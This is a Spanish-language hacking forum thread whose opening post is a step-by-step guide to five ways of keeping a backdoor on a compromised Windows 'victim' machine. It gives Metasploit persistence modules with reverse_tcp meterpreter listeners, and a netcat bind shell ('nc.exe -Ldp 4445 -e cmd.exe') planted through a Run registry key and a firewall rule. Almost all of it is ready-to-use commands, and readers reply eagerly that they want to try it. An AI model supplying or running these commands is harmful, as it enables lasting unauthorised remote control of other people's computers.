5 Backdoors Persistentes

Iniciado por afravaz, Septiembre 06, 2016, 09:22:13 AM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Septiembre 06, 2016, 09:22:13 AM Ultima modificación: Septiembre 06, 2016, 01:13:21 PM por Gabriela

Requisitos:
Sesión meterpreter con permisos elevados (Bypass UAC)
Metasploit
Netcat
Distribución Linux (Atacante)
Windows (Víctima)

Persistencia:
En la sesión meterpreter con permisos elevados:
Citarrun persistence –X –i 10 –p 443 –r [IP]
Código: php
-X= Conectarse cuando el sistema reinicie.
-i 10= Intentar conectarse cada 10 segundos.
-p 443= Puerto de conexión reversa.
-r ip= IP de conexión reversa-

Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
Código: php
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 443
set LHOST [IP LOCAL]
exploit


s4u_persistence:
Crea una tarea programada que se ejecutará utilizando el servicio para el usuario (S4U). Esto permite que la tarea programada para ejecutarse incluso como un usuario sin privilegios que no se registra en el dispositivo. Esto resultará en contexto de seguridad más bajo, lo que permite el acceso sólo a los recursos locales. El módulo requiere 'Logon as a batch job' permisos (SeBatchLogonRight).
Pondremos en background la sesión meterpreter con bypass uac y:
Código: php
use exploit/windows/local/s4u_persistence
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 443
set trigger logon
set session [Número sesión]
exploit

Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
Código: php
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
exploit


VSS_PERSISTENCE:
Este módulo intentará crear un payload persistente en una nueva instantánea de volumen. Esto se basa en la secuencia de comandos VSSOwn publicado originalmente por Tim Tomes y Mark Baggett. Este módulo ha sido probado con éxito en Windows 7. Con el fin de lograr la persistencia a través de la opción RUNKEY, el usuario debe necesitar una contraseña para iniciar sesión en el equipo atacado.
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
Código: php
use exploit/windows/local/vss_persistence
set runkey true
set schtask true
set RHOST [IP VÍCTIMA]
set session [Número sesión]
exploit

Ahora al ejecutar el exploit se creará un backdoor y una nueva sesión meterpreter.
Ahora al reiniciar el equipo víctima se perderán las sesiones meterpreter, usa el siguiente comando para abrir una nueva:
Código: php
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 4444
exploit


REGISTRY PERSISTENCE:
En este módulo se instalará un payload que se ejecutará durante el arranque. Será ejecutado ya sea al iniciar la sesión de usuario o el inicio del sistema mediante el valor de registro en "CurrentVersion \ Run" (dependiendo de privilegio y método seleccionado). El payload se instalará completamente en el primer registro de la sesión fondo meterpreter y luego ejecutar los comandos:
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
Código: php
use exploit/windows/local/registry_persistence
set payload windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 4545
set startup system
set session [Número de la sesión]
exploit

Ahora al reiniciar el sistema perderemos las sesiones asique usaremos los siguientes comandos para abrir una nueva:
Código: php
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 4545
exploit


NETCAT:
Netcat es una utilidad de red ofrecido que lee y escribe datos a través de conexiones de red, utilizando el protocolo TCP / IP.
Después de tener nuestra sesión meterpreter con bypass uac pondremos:
Citarupload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32
Ahora vamos a setear el valor del registro:
Citarreg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'
Abrimos una shell con el comando:
Citarshell
Y abriremos el puerto en el firewall:
Citarnetsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445
Para saber que todo está bien configurado pondremos:
Citarnetsh firewall show portopening
Veremos que tenemos la regla de netcat en el firewall.
Una vez reiniciemos el pc víctima, para conectarnos a él usaremos el comando:
Citarnc  -nv [IP VÍCTIMA] [PUERTO/4445]
elcandadoinformatico. Tú blog sobre Seguridad Informática en español.

Septiembre 06, 2016, 11:30:33 AM #1 Ultima modificación: Septiembre 06, 2016, 01:13:52 PM por Gabriela
Zarpado!! Copado posta maaaaaal!

Que ganas de probarlo!- Formas de bypassear el UAC sin meterpreter, desde windows en la misma red, como se puede?
Pikaa~


Justo lo que estaba buscando, gracias por todas las opciones detalladas afravaz